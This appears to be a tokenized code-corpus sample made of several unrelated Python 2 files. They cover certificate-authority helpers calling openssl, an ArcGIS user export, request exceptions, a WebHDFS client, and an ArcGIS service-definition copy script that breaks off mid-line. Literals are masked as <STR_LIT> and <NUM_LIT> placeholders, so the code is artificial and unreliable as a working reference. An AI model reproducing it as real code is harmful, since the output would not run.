rmtree ( domaindir , ignore_errors = True ) <EOL> def new_domain ( conf ) : <EOL> """<STR_LIT>""" <EOL> outpath = conf . configuration [ "<STR_LIT>" ] [ "<STR_LIT>" ] <EOL> private = conf . configuration [ "<STR_LIT>" ] [ "<STR_LIT>" ] <EOL> crlpath = conf . configuration [ "<STR_LIT>" ] [ "<STR_LIT>" ] <EOL> private_key = conf . configuration [ "<STR_LIT>" ] [ "<STR_LIT>" ] <EOL> out = conf . configuration [ "<STR_LIT>" ] [ "<STR_LIT>" ] <EOL> password_file = os . path . join ( private , "<STR_LIT>" ) <EOL> os . umask ( <NUM_LIT> <NUM_LIT> ) <EOL> try : <EOL> os . mkdir ( crlpath , <NUM_LIT:0> <NUM_LIT> ) <EOL> except OSError : <EOL> pass <EOL> try : <EOL> os . mkdir ( outpath , <NUM_LIT:0> <NUM_LIT> ) <EOL> except OSError : <EOL> pass <EOL> try : <EOL> os . mkdir ( private , <NUM_LIT:0> <NUM_LIT> ) <EOL> except OSError : <EOL> pass <EOL> touch ( conf . configuration [ "<STR_LIT>" ] [ "<STR_LIT>" ] ) <EOL> serialfd = open ( conf . configuration [ "<STR_LIT>" ] [ "<STR_LIT>" ] , '<STR_LIT:w>' ) <EOL> serialfd . write ( "<STR_LIT>" ) <EOL> serialfd . close ( ) <EOL> organization = conf . domain <EOL> commonname = conf . domain <EOL> subject = "<STR_LIT>" . format ( organization , commonname ) <EOL> log = subprocess . Popen ( [ "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , password_file , "<STR_LIT>" ] , <EOL> stdout = subprocess . PIPE , <EOL> stderr = subprocess . PIPE ) <EOL> stdout , stderr = log . communicate ( ) <EOL> if log . returncode != <NUM_LIT:0> : <EOL> raise IOError ( stderr ) <EOL> log = subprocess . Popen ( [ "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , conf . configfile , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , subject , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" . format ( password_file ) , <EOL> "<STR_LIT>" , out , <EOL> "<STR_LIT>" , private_key ] , <EOL> stdout = subprocess . PIPE , <EOL> stderr = subprocess . PIPE ) <EOL> stdout , stderr = log . communicate ( ) <EOL> if log . returncode != <NUM_LIT:0> : <EOL> raise IOError ( stderr ) <EOL> return out <EOL> def copy_cert ( conf , path ) : <EOL> """<STR_LIT>""" <EOL> cert_file = conf . configuration [ "<STR_LIT>" ] [ "<STR_LIT>" ] <EOL> try : <EOL> with open ( cert_file , '<STR_LIT>' ) as f : <EOL> cert_str = f . read ( ) <EOL> cert = OpenSSL . crypto . load_certificate ( OpenSSL . crypto . FILETYPE_PEM , cert_str ) <EOL> cert_hash = format ( cert . subject_name_hash ( ) , '<STR_LIT:x>' ) <EOL> except : <EOL> _log . exception ( "<STR_LIT>" ) <EOL> raise Exception ( "<STR_LIT>" ) <EOL> out_file = os . path . join ( path , cert_hash + "<STR_LIT>" ) <EOL> shutil . copyfile ( cert_file , out_file ) <EOL> return out_file <EOL> def sign_file ( conf , file ) : <EOL> """<STR_LIT>""" <EOL> private = conf . configuration [ "<STR_LIT>" ] [ "<STR_LIT>" ] <EOL> cert_file = conf . configuration [ "<STR_LIT>" ] [ "<STR_LIT>" ] <EOL> private_key = conf . configuration [ "<STR_LIT>" ] [ "<STR_LIT>" ] <EOL> password_file = os . path . join ( private , "<STR_LIT>" ) <EOL> try : <EOL> with open ( cert_file , '<STR_LIT>' ) as f : <EOL> cert_str = f . read ( ) <EOL> cert = OpenSSL . crypto . load_certificate ( OpenSSL . crypto . FILETYPE_PEM , cert_str ) <EOL> cert_hash = format ( cert . subject_name_hash ( ) , '<STR_LIT:x>' ) <EOL> except : <EOL> _log . exception ( "<STR_LIT>" ) <EOL> raise Exception ( "<STR_LIT>" ) <EOL> sign_file = file + "<STR_LIT>" + cert_hash <EOL> log = subprocess . Popen ( [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , private_key , <EOL> "<STR_LIT>" , "<STR_LIT>" + password_file , <EOL> "<STR_LIT>" , sign_file , <EOL> file ] , <EOL> stdout = subprocess . PIPE , <EOL> stderr = subprocess . PIPE ) <EOL> stdout , stderr = log . communicate ( ) <EOL> if log . returncode != <NUM_LIT:0> : <EOL> raise IOError ( stderr ) <EOL> return sign_file <EOL> def sign_req ( conf , req , name ) : <EOL> """<STR_LIT>""" <EOL> private = conf . configuration [ "<STR_LIT>" ] [ "<STR_LIT>" ] <EOL> requestpath = conf . configuration [ "<STR_LIT>" ] [ "<STR_LIT>" ] <EOL> certspath = conf . configuration [ "<STR_LIT>" ] [ "<STR_LIT>" ] <EOL> name_dir = os . path . join ( conf . configuration [ "<STR_LIT>" ] [ "<STR_LIT>" ] , name ) <EOL> password_file = os . path . join ( private , "<STR_LIT>" ) <EOL> signed = os . path . join ( certspath , "<STR_LIT>" ) <EOL> request = os . path . join ( requestpath , req ) <EOL> os . umask ( <NUM_LIT> <NUM_LIT> ) <EOL> try : <EOL> os . mkdir ( private , <NUM_LIT:0> <NUM_LIT> ) <EOL> except OSError : <EOL> pass <EOL> try : <EOL> os . mkdir ( certspath , <NUM_LIT:0> <NUM_LIT> ) <EOL> except OSError : <EOL> pass <EOL> fname_lock = "<STR_LIT>" . format ( conf . configuration [ "<STR_LIT>" ] [ "<STR_LIT>" ] ) <EOL> fdlock = None <EOL> try : <EOL> while True : <EOL> try : <EOL> fdlock = os . open ( fname_lock , os . O_CREAT | os . O_EXCL | os . O_RDWR ) <EOL> except OSError : <EOL> time . sleep ( random . random ( ) * <NUM_LIT> ) <EOL> continue <EOL> break <EOL> serial = incr ( conf . configuration [ "<STR_LIT>" ] [ "<STR_LIT>" ] ) <EOL> log = subprocess . Popen ( [ "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , request , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , conf . configfile , <EOL> "<STR_LIT>" , signed , <EOL> "<STR_LIT>" , "<STR_LIT>" + password_file ] , <EOL> stdout = subprocess . PIPE , <EOL> stderr = subprocess . PIPE , <EOL> stdin = subprocess . PIPE ) <EOL> log . stdin . write ( "<STR_LIT>" ) <EOL> stdout , stderr = log . communicate ( "<STR_LIT>" ) <EOL> if log . returncode != <NUM_LIT:0> : <EOL> raise IOError ( stderr ) <EOL> fp = fingerprint ( signed ) <EOL> newcert = "<STR_LIT>" . format ( fp . replace ( "<STR_LIT::>" , "<STR_LIT>" ) [ - <NUM_LIT> : ] ) <EOL> except : <EOL> pass <EOL> finally : <EOL> if fdlock : <EOL> try : <EOL> os . close ( fdlock ) <EOL> os . remove ( fname_lock ) <EOL> except : <EOL> pass <EOL> try : <EOL> os . makedirs ( os . path . join ( name_dir , "<STR_LIT>" ) ) <EOL> except OSError : <EOL> pass <EOL> try : <EOL> os . makedirs ( os . path . join ( name_dir , "<STR_LIT>" ) ) <EOL> except OSError : <EOL> pass <EOL> newkeyname = os . path . join ( name_dir , "<STR_LIT>" , newcert ) <EOL> print ( signed ) <EOL> print ( newkeyname ) <EOL> os . rename ( signed , newkeyname ) <EOL> return newkeyname <EOL> def obtain_cert_node_info ( name ) : <EOL> """<STR_LIT>""" <EOL> cert_conffile = _conf . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> domain = _conf . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> if domain is None or name is None : <EOL> _log . debug ( "<STR_LIT>" . format ( domain , name ) ) <EOL> return { '<STR_LIT>' : None , '<STR_LIT:name>' : name , '<STR_LIT:id>' : calvinuuid . uuid ( "<STR_LIT>" ) } <EOL> cert_conf = Config ( cert_conffile , domain ) <EOL> name_dir = os . path . join ( cert_conf . configuration [ "<STR_LIT>" ] [ "<STR_LIT>" ] , name ) <EOL> try : <EOL> filenames = os . listdir ( os . path . join ( name_dir , "<STR_LIT>" ) ) <EOL> content = open ( os . path . join ( name_dir , "<STR_LIT>" , filenames [ <NUM_LIT:0> ] ) , '<STR_LIT>' ) . read ( ) <EOL> cert = OpenSSL . crypto . load_certificate ( OpenSSL . crypto . FILETYPE_PEM , <EOL> content ) <EOL> subject = cert . get_subject ( ) <EOL> if subject . commonName != name or subject . organizationName != domain : <EOL> raise <EOL> _log . debug ( "<STR_LIT>" . format ( domain , name ) ) <EOL> return { '<STR_LIT>' : domain , '<STR_LIT:name>' : name , '<STR_LIT:id>' : subject . dnQualifier } <EOL> except : <EOL> pass <EOL> csrfile = new_runtime ( cert_conf , name , nodeid = calvinuuid . uuid ( "<STR_LIT>" ) ) <EOL> _log . debug ( "<STR_LIT>" . format ( csrfile , domain , name ) ) <EOL> try : <EOL> content = open ( csrfile , '<STR_LIT>' ) . read ( ) <EOL> cert = OpenSSL . crypto . load_certificate_request ( OpenSSL . crypto . FILETYPE_PEM , <EOL> content ) <EOL> subject = cert . get_subject ( ) <EOL> sign_req ( cert_conf , os . path . basename ( csrfile ) , name ) <EOL> _log . debug ( "<STR_LIT>" . format ( domain , name ) ) <EOL> return { '<STR_LIT>' : domain , '<STR_LIT:name>' : name , '<STR_LIT:id>' : subject . dnQualifier } <EOL> except : <EOL> return { '<STR_LIT>' : None , '<STR_LIT:name>' : name , '<STR_LIT:id>' : calvinuuid . uuid ( "<STR_LIT>" ) } </s>
<s> import csv , time <EOL> from agoTools . admin import Admin <EOL> agoAdmin = Admin ( '<STR_LIT>' ) <EOL> users = agoAdmin . getUsers ( ) <EOL> roles = agoAdmin . getRoles ( ) <EOL> roleLookup = { } <EOL> for role in roles : <EOL> roleLookup [ role [ "<STR_LIT:id>" ] ] = role [ "<STR_LIT:name>" ] <EOL> outputFile = '<STR_LIT>' <EOL> with open ( outputFile , '<STR_LIT:wb>' ) as output : <EOL> dataWriter = csv . writer ( output , delimiter = '<STR_LIT:U+002C>' , quotechar = '<STR_LIT:|>' , quoting = csv . QUOTE_MINIMAL ) <EOL> dataWriter . writerow ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> for user in users : <EOL> roleID = user [ '<STR_LIT>' ] <EOL> roleName = roleLookup . get ( roleID , roleID ) <EOL> dataWriter . writerow ( [ user [ '<STR_LIT>' ] . encode ( '<STR_LIT:utf-8>' ) , user [ '<STR_LIT:email>' ] . encode ( '<STR_LIT:utf-8>' ) , user [ '<STR_LIT:username>' ] . encode ( '<STR_LIT:utf-8>' ) , roleName , time . strftime ( "<STR_LIT>" , time . gmtime ( user [ '<STR_LIT>' ] / <NUM_LIT:1000> ) ) , "<STR_LIT:U+002C>" . join ( user [ '<STR_LIT>' ] ) ] ) </s>
<s> """<STR_LIT>""" <EOL> class RequestException ( RuntimeError ) : <EOL> """<STR_LIT>""" <EOL> class HTTPError ( RequestException ) : <EOL> """<STR_LIT>""" <EOL> response = None <EOL> class ConnectionError ( RequestException ) : <EOL> """<STR_LIT>""" <EOL> class SSLError ( ConnectionError ) : <EOL> """<STR_LIT>""" <EOL> class Timeout ( RequestException ) : <EOL> """<STR_LIT>""" <EOL> class URLRequired ( RequestException ) : <EOL> """<STR_LIT>""" <EOL> class TooManyRedirects ( RequestException ) : <EOL> """<STR_LIT>""" <EOL> class MissingSchema ( RequestException , ValueError ) : <EOL> """<STR_LIT>""" <EOL> class InvalidSchema ( RequestException , ValueError ) : <EOL> """<STR_LIT>""" <EOL> class InvalidURL ( RequestException , ValueError ) : <EOL> """<STR_LIT>""" </s>
<s> import sys , os <EOL> import stat <EOL> import httplib <EOL> import urlparse <EOL> import json <EOL> import logging <EOL> __all__ = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> logging . basicConfig ( level = logging . DEBUG , datefmt = '<STR_LIT>' , <EOL> format = '<STR_LIT>' ) <EOL> logger = logging . getLogger ( name = '<STR_LIT>' ) <EOL> WEBHDFS_CONTEXT_ROOT = "<STR_LIT>" <EOL> class WebHDFS ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , namenode_host , namenode_port , hdfs_username ) : <EOL> self . namenode_host = namenode_host <EOL> self . namenode_port = namenode_port <EOL> self . username = hdfs_username <EOL> def mkDir ( self , path ) : <EOL> url_path = WEBHDFS_CONTEXT_ROOT + path + '<STR_LIT>' + self . username <EOL> logger . debug ( "<STR_LIT>" + url_path ) <EOL> httpClient = self . __getNameNodeHTTPClient ( ) <EOL> httpClient . request ( '<STR_LIT>' , url_path , headers = { } ) <EOL> response = httpClient . getresponse ( ) <EOL> logger . debug ( "<STR_LIT>" % ( response . status , response . reason ) ) <EOL> httpClient . close ( ) <EOL> CheckResponseError ( response ) <EOL> def delete ( self , path , recursive = False ) : <EOL> url_path = WEBHDFS_CONTEXT_ROOT + path + '<STR_LIT>' + ( '<STR_LIT:true>' if recursive else '<STR_LIT:false>' ) + '<STR_LIT>' + self . username <EOL> logger . debug ( "<STR_LIT>" + url_path ) <EOL> httpClient = self . __getNameNodeHTTPClient ( ) <EOL> httpClient . request ( '<STR_LIT>' , url_path , headers = { } ) <EOL> response = httpClient . getresponse ( ) <EOL> logger . debug ( "<STR_LIT>" % ( response . status , response . reason ) ) <EOL> httpClient . close ( ) <EOL> CheckResponseError ( response ) <EOL> def rmDir ( self , path ) : <EOL> self . delete ( path , recursive = True ) <EOL> def copyToHDFS ( self , source_path , target_path , replication = <NUM_LIT:1> , overwrite = False ) : <EOL> url_path = WEBHDFS_CONTEXT_ROOT + target_path + '<STR_LIT>' + ( '<STR_LIT:true>' if overwrite else '<STR_LIT:false>' ) + '<STR_LIT>' + str ( replication ) + '<STR_LIT>' + self . username <EOL> httpClient = self . __getNameNodeHTTPClient ( ) <EOL> httpClient . request ( '<STR_LIT>' , url_path , headers = { } ) <EOL> response = httpClient . getresponse ( ) <EOL> logger . debug ( "<STR_LIT>" % ( response . status , response . reason , response . msg ) ) <EOL> redirect_location = response . msg [ "<STR_LIT:location>" ] <EOL> logger . debug ( "<STR_LIT>" % ( redirect_location ) ) <EOL> result = urlparse . urlparse ( redirect_location ) <EOL> redirect_host = result . netloc [ : result . netloc . index ( "<STR_LIT::>" ) ] <EOL> redirect_port = result . netloc [ ( result . netloc . index ( "<STR_LIT::>" ) + <NUM_LIT:1> ) : ] <EOL> redirect_path = result . path + "<STR_LIT:?>" + result . query <EOL> logger . debug ( "<STR_LIT>" % ( redirect_host , redirect_port , redirect_path ) ) <EOL> fileUploadClient = httplib . HTTPConnection ( redirect_host , <EOL> redirect_port , timeout = <NUM_LIT> ) <EOL> fileUploadClient . request ( '<STR_LIT>' , redirect_path , open ( source_path , "<STR_LIT:rb>" ) , headers = { } ) <EOL> response = fileUploadClient . getresponse ( ) <EOL> logger . debug ( "<STR_LIT>" % ( response . status , response . reason ) ) <EOL> httpClient . close ( ) <EOL> fileUploadClient . close ( ) <EOL> CheckResponseError ( response ) <EOL> def appendToHDFS ( self , source_path , target_path ) : <EOL> url_path = WEBHDFS_CONTEXT_ROOT + target_path + '<STR_LIT>' + self . username <EOL> httpClient = self . __getNameNodeHTTPClient ( ) <EOL> httpClient . request ( '<STR_LIT:POST>' , url_path , headers = { } ) <EOL> response = httpClient . getresponse ( ) <EOL> logger . debug ( "<STR_LIT>" % ( response . status , response . reason , response . msg ) ) <EOL> redirect_location = response . msg [ "<STR_LIT:location>" ] <EOL> logger . debug ( "<STR_LIT>" % ( redirect_location ) ) <EOL> result = urlparse . urlparse ( redirect_location ) <EOL> redirect_host = result . netloc [ : result . netloc . index ( "<STR_LIT::>" ) ] <EOL> redirect_port = result . netloc [ ( result . netloc . index ( "<STR_LIT::>" ) + <NUM_LIT:1> ) : ] <EOL> redirect_path = result . path + "<STR_LIT:?>" + result . query <EOL> logger . debug ( "<STR_LIT>" % ( redirect_host , redirect_port , redirect_path ) ) <EOL> fileUploadClient = httplib . HTTPConnection ( redirect_host , <EOL> redirect_port , timeout = <NUM_LIT> ) <EOL> fileUploadClient . request ( '<STR_LIT:POST>' , redirect_path , open ( source_path , "<STR_LIT:rb>" ) , headers = { } ) <EOL> response = fileUploadClient . getresponse ( ) <EOL> logger . debug ( "<STR_LIT>" % ( response . status , response . reason ) ) <EOL> httpClient . close ( ) <EOL> fileUploadClient . close ( ) <EOL> CheckResponseError ( response ) <EOL> def copyFromHDFS ( self , source_path , target_path , overwrite = False ) : <EOL> if os . path . isfile ( target_path ) and overwrite == False : <EOL> raise WebHDFSError ( "<STR_LIT>" + target_path + "<STR_LIT>" ) <EOL> url_path = WEBHDFS_CONTEXT_ROOT + source_path + '<STR_LIT>' + self . username <EOL> logger . debug ( "<STR_LIT>" % url_path ) <EOL> httpClient = self . __getNameNodeHTTPClient ( ) <EOL> httpClient . request ( '<STR_LIT:GET>' , url_path , headers = { } ) <EOL> response = httpClient . getresponse ( ) <EOL> if response . length != None : <EOL> msg = response . msg <EOL> redirect_location = msg [ "<STR_LIT:location>" ] <EOL> logger . debug ( "<STR_LIT>" % ( response . status , response . reason ) ) <EOL> logger . debug ( "<STR_LIT>" % ( redirect_location ) ) <EOL> result = urlparse . urlparse ( redirect_location ) <EOL> redirect_host = result . netloc [ : result . netloc . index ( "<STR_LIT::>" ) ] <EOL> redirect_port = result . netloc [ ( result . netloc . index ( "<STR_LIT::>" ) + <NUM_LIT:1> ) : ] <EOL> redirect_path = result . path + "<STR_LIT:?>" + result . query <EOL> logger . debug ( "<STR_LIT>" % ( redirect_host , redirect_port , redirect_path ) ) <EOL> fileDownloadClient = httplib . HTTPConnection ( redirect_host , <EOL> redirect_port , timeout = <NUM_LIT> ) <EOL> fileDownloadClient . request ( '<STR_LIT:GET>' , redirect_path , headers = { } ) <EOL> response = fileDownloadClient . getresponse ( ) <EOL> logger . debug ( "<STR_LIT>" % ( response . status , response . reason ) ) <EOL> rcv_buf_size = <NUM_LIT> * <NUM_LIT> <EOL> target_file = open ( target_path , "<STR_LIT:wb>" ) <EOL> while True : <EOL> resp = response . read ( rcv_buf_size ) <EOL> if len ( resp ) == <NUM_LIT:0> : <EOL> break <EOL> target_file . write ( resp ) <EOL> target_file . close ( ) <EOL> fileDownloadClient . close ( ) <EOL> else : <EOL> target_file = open ( target_path , "<STR_LIT:wb>" ) <EOL> target_file . close ( ) <EOL> httpClient . close ( ) <EOL> CheckResponseError ( response ) <EOL> def getFileStatus ( self , path ) : <EOL> url_path = WEBHDFS_CONTEXT_ROOT + path + '<STR_LIT>' + self . username <EOL> httpClient = self . __getNameNodeHTTPClient ( ) <EOL> httpClient . request ( '<STR_LIT:GET>' , url_path , headers = { } ) <EOL> response = httpClient . getresponse ( ) <EOL> data_dict = json . loads ( response . read ( ) ) <EOL> httpClient . close ( ) <EOL> CheckResponseError ( response ) <EOL> try : <EOL> return data_dict [ '<STR_LIT>' ] <EOL> except : <EOL> return '<STR_LIT>' <EOL> def listDir ( self , path ) : <EOL> url_path = WEBHDFS_CONTEXT_ROOT + path + '<STR_LIT>' + self . username <EOL> logger . debug ( "<STR_LIT>" + url_path ) <EOL> httpClient = self . __getNameNodeHTTPClient ( ) <EOL> httpClient . request ( '<STR_LIT:GET>' , url_path , headers = { } ) <EOL> response = httpClient . getresponse ( ) <EOL> logger . debug ( "<STR_LIT>" % ( response . status , response . reason ) ) <EOL> data_dict = json . loads ( response . read ( ) ) <EOL> httpClient . close ( ) <EOL> CheckResponseError ( response ) <EOL> logger . debug ( "<STR_LIT>" + str ( data_dict ) ) <EOL> files = [ ] <EOL> try : <EOL> for i in data_dict [ "<STR_LIT>" ] [ "<STR_LIT>" ] : <EOL> logger . debug ( i [ "<STR_LIT:type>" ] + "<STR_LIT>" + i [ "<STR_LIT>" ] ) <EOL> files . append ( i [ "<STR_LIT>" ] ) <EOL> except : <EOL> pass <EOL> return files <EOL> def listDirEx ( self , path ) : <EOL> url_path = WEBHDFS_CONTEXT_ROOT + path + '<STR_LIT>' + self . username <EOL> logger . debug ( "<STR_LIT>" + url_path ) <EOL> httpClient = self . __getNameNodeHTTPClient ( ) <EOL> httpClient . request ( '<STR_LIT:GET>' , url_path , headers = { } ) <EOL> response = httpClient . getresponse ( ) <EOL> logger . debug ( "<STR_LIT>" % ( response . status , response . reason ) ) <EOL> data_dict = json . loads ( response . read ( ) ) <EOL> httpClient . close ( ) <EOL> CheckResponseError ( response ) <EOL> logger . debug ( "<STR_LIT>" + str ( data_dict ) ) <EOL> try : <EOL> return data_dict [ "<STR_LIT>" ] [ "<STR_LIT>" ] <EOL> except : <EOL> return [ ] <EOL> def getHomeDir ( self ) : <EOL> url_path = WEBHDFS_CONTEXT_ROOT + '<STR_LIT>' + self . username <EOL> httpClient = self . __getNameNodeHTTPClient ( ) <EOL> httpClient . request ( '<STR_LIT:GET>' , url_path , headers = { } ) <EOL> response = httpClient . getresponse ( ) <EOL> data_dict = json . loads ( response . read ( ) ) <EOL> httpClient . close ( ) <EOL> CheckResponseError ( response ) <EOL> try : <EOL> return data_dict [ '<STR_LIT>' ] <EOL> except : <EOL> return '<STR_LIT>' <EOL> def __getNameNodeHTTPClient ( self ) : <EOL> httpClient = httplib . HTTPConnection ( self . namenode_host , self . namenode_port , timeout = <NUM_LIT> ) <EOL> return httpClient <EOL> class WebHDFSError ( Exception ) : <EOL> reason = '<STR_LIT>' <EOL> def __init__ ( self , reason ) : <EOL> self . reason = reason <EOL> def __str__ ( self ) : <EOL> return self . reason <EOL> def CheckResponseError ( response ) : <EOL> if response != None and response . status >= <NUM_LIT> : <EOL> raise WebHDFSError ( '<STR_LIT>' . format ( response . status , response . reason ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> try : <EOL> webhdfs = WebHDFS ( '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' ) <EOL> webhdfs . mkDir ( '<STR_LIT>' ) <EOL> resp = webhdfs . copyToHDFS ( '<STR_LIT>' , '<STR_LIT>' , overwrite = True ) <EOL> webhdfs . copyFromHDFS ( '<STR_LIT>' , '<STR_LIT>' , overwrite = True ) <EOL> webhdfs . listDir ( '<STR_LIT>' ) <EOL> webhdfs . delete ( '<STR_LIT>' , recursive = True ) <EOL> except WebHDFSError as whe : <EOL> print whe <EOL> except : <EOL> print "<STR_LIT>" + str ( sys . exc_info ( ) ) <EOL> else : <EOL> print '<STR_LIT>' </s>
<s> import sys , os , traceback , datetime , json , subprocess , tempfile <EOL> from walkingDirTrees import listFiles <EOL> from AGSRestFunctions import getServerDirectory <EOL> from AGSRestFunctions import getServiceList <EOL> from AGSRestFunctions import getServiceInfo <EOL> from shutil import copy2 <EOL> from shutil import rmtree <EOL> from socket import getfqdn <EOL> import copy , json <EOL> supportFilesPath = os . path . join ( <EOL> os . path . dirname ( os . path . dirname ( sys . argv [ <NUM_LIT:0> ] ) ) , '<STR_LIT>' , '<STR_LIT>' ) <EOL> sys . path . append ( supportFilesPath ) <EOL> from portalpy import Portal <EOL> sevenZipExePath = r'<STR_LIT>' <EOL> scriptName = sys . argv [ <NUM_LIT:0> ] <EOL> exitErrCode = <NUM_LIT:1> <EOL> debug = False <EOL> sdFilePattern = '<STR_LIT>' <EOL> sectionBreak = '<STR_LIT:=>' * <NUM_LIT> <EOL> sectionBreak1 = '<STR_LIT:->' * <NUM_LIT> <EOL> def check_args ( ) : <EOL> if len ( sys . argv ) < <NUM_LIT:6> : <EOL> print '<STR_LIT:\n>' + scriptName + '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> return None <EOL> else : <EOL> server = sys . argv [ <NUM_LIT:1> ] <EOL> port = sys . argv [ <NUM_LIT:2> ] <EOL> adminuser = sys . argv [ <NUM_LIT:3> ] <EOL> password = sys . argv [ <NUM_LIT:4> ] <EOL> exeType = sys . argv [ <NUM_LIT:5> ] <EOL> targetFolder = None <EOL> specified_users = None <EOL> users = None <EOL> if len ( sys . argv ) >= <NUM_LIT:7> : <EOL> targetFolder = sys . argv [ <NUM_LIT:6> ] <EOL> if len ( sys . argv ) >= <NUM_LIT:8> : <EOL> specified_users = sys . argv [ <NUM_LIT:7> ] <EOL> if port . strip ( ) == '<STR_LIT:#>' : <EOL> port = None <EOL> exeType = exeType . upper ( ) . strip ( ) <EOL> if exeType < > '<STR_LIT>' and exeType < > '<STR_LIT>' : <EOL> print '<STR_LIT>' <EOL> return None <EOL> if exeType == '<STR_LIT>' : <EOL> doCopy = True <EOL> else : <EOL> doCopy = False <EOL> if doCopy : <EOL> if not targetFolder : <EOL> print '<STR_LIT>' <EOL> return None <EOL> if not os . path . exists ( targetFolder ) : <EOL> print '<STR_LIT>' + targetFolder + '<STR_LIT>' <EOL> return None <EOL> if len ( os . listdir ( targetFolder ) ) > <NUM_LIT:0> : <EOL> print '<STR_LIT>' + targetFolder + '<STR_LIT>' <EOL> return None <EOL> if specified_users : <EOL> users = specified_users . replace ( '<STR_LIT:U+0020>' , '<STR_LIT>' ) . split ( '<STR_LIT:U+002C>' ) <EOL> return server , port , adminuser , password , doCopy , targetFolder , users <EOL> def extractFromSDFile ( sdFile , extractFolder , fileToExtract = None ) : <EOL> '''<STR_LIT>''' <EOL> exeArgs = '<STR_LIT>' . format ( sevenZipExePath , sdFile , extractFolder ) <EOL> if fileToExtract : <EOL> exeArgs += '<STR_LIT>' . format ( fileToExtract ) <EOL> exeArgs += '<STR_LIT>' <EOL> exitCode = subprocess . call ( exeArgs ) <EOL> return exitCode <EOL> def get_sd_files ( sdRootFolder ) : <EOL> '''<STR_LIT>''' <EOL> fileInfo = dict ( ) <EOL> extractFolder = tempfile . mkdtemp ( ) <EOL> sdFilePaths = listFiles ( sdRootFolder , sdFilePattern ) <EOL> for sdFile in sdFilePaths : <EOL> extractFile = '<STR_LIT>' <EOL> jsonFile = os . path . join ( extractFolder , extractFile ) <EOL> extractFromSDFile ( sdFile , extractFolder , extractFile ) <EOL> os . chdir ( extractFolder ) <EOL> serviceConfig = json . load ( open ( extractFile ) ) <EOL> folderName = serviceConfig [ '<STR_LIT>' ] <EOL> serviceName = serviceConfig [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> serviceType = serviceConfig [ '<STR_LIT>' ] [ '<STR_LIT:type>' ] <EOL> fileKey = serviceName + '<STR_LIT:.>' + serviceType <EOL> if folderName : <EOL> fileKey = folderName + '<STR_LIT>' + fileKey <EOL> creationTime = os . path . getctime ( sdFile ) <EOL> modifiedTime = os . path . getmtime ( sdFile ) <EOL> compareTime = modifiedTime <EOL> if fileKey in fileInfo : <EOL> fileTime = fileInfo [ fileKey ] [ '<STR_LIT>' ] <EOL> if compareTime > fileTime : <EOL> fileInfo [ fileKey ] = { '<STR_LIT:path>' : sdFile , '<STR_LIT>' : compareTime } <EOL> else : <EOL> fileInfo [ fileKey ] = { '<STR_LIT:path>' : sdFile , '<STR_LIT>' : compareTime } <EOL> if debug : <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> for i in fileInfo : <EOL> print i + '<STR_LIT>' + fileInfo [ i ] [ '<STR_LIT:path>' ] + '<STR_LIT>' + str ( fileInfo [ i ] [ '<STR_LIT>' ] ) <EOL> return fileInfo <EOL> def get_ags_services ( server , port , adminuser , password ) : <EOL> '''<STR_LIT>''' <EOL> agsServices = { } <EOL> allServices = getServiceList ( server , port , adminuser , password ) <EOL> excludeServices = [ '<STR_LIT>' ] <EOL> services = [ service for service in allServices if service not in excludeServices ] <EOL> for service in services : <EOL> parsedService = service . split ( '<STR_LIT>' ) <EOL> folder = None <EOL> if len ( parsedService ) == <NUM_LIT:1> : <EOL> serviceNameType = parsedService [ <NUM_LIT:0> ] <EOL> else : <EOL> folder = parsedService [ <NUM_LIT:0> ] <EOL> serviceNameType = parsedService [ <NUM_LIT:1> ] <EOL> info = getServiceInfo ( server , port , adminuser , password , folder , serviceNameType ) <EOL> agsServices [ service ] = info <EOL> if debug : <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print agsServices <EOL> return agsServices <EOL> def filesToCopy ( sdFiles , agsServices , copyItemIDs = None ) : <EOL> '''<STR_LIT>''' <EOL> sdFilesToCopy = { } <EOL> for i in agsServices : <EOL> serviceInfo = agsServices [ i ] <EOL> portalItemsJson = serviceInfo [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> if i in sdFiles : <EOL> if copyItemIDs : <EOL> if portalItemsJson : <EOL> for portalItemJson in portalItemsJson : <EOL> itemID = portalItemJson [ '<STR_LIT>' ] <EOL> if itemID in copyItemIDs : <EOL> sdFilesToCopy [ i ] = sdFiles [ i ] <EOL> else : <EOL> sdFilesToCopy [ i ] = sdFiles [ i ] <EOL> if debug : <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> for key , value in sdFilesToCopy . iteritems ( ) : <EOL> print str ( key ) + '<STR_LIT>' + str ( value ) <EOL> return sdFilesToCopy <EOL> def copySDFiles ( sdFilesToCopy , targetFolder , agsServices , portalProps ) : <EOL> '''<STR_LIT>''' <EOL> print '<STR_LIT:\n>' + sectionBreak <EOL> print '<STR_LIT>' <EOL> print sectionBreak <EOL> print '<STR_LIT>' . format ( '<STR_LIT>' , '<STR_LIT:|>' , '<STR_LIT>' ) <EOL> print sectionBreak1 <EOL> for service , serviceInfo in sdFilesToCopy . iteritems ( ) : <EOL> sdFilePath = serviceInfo [ 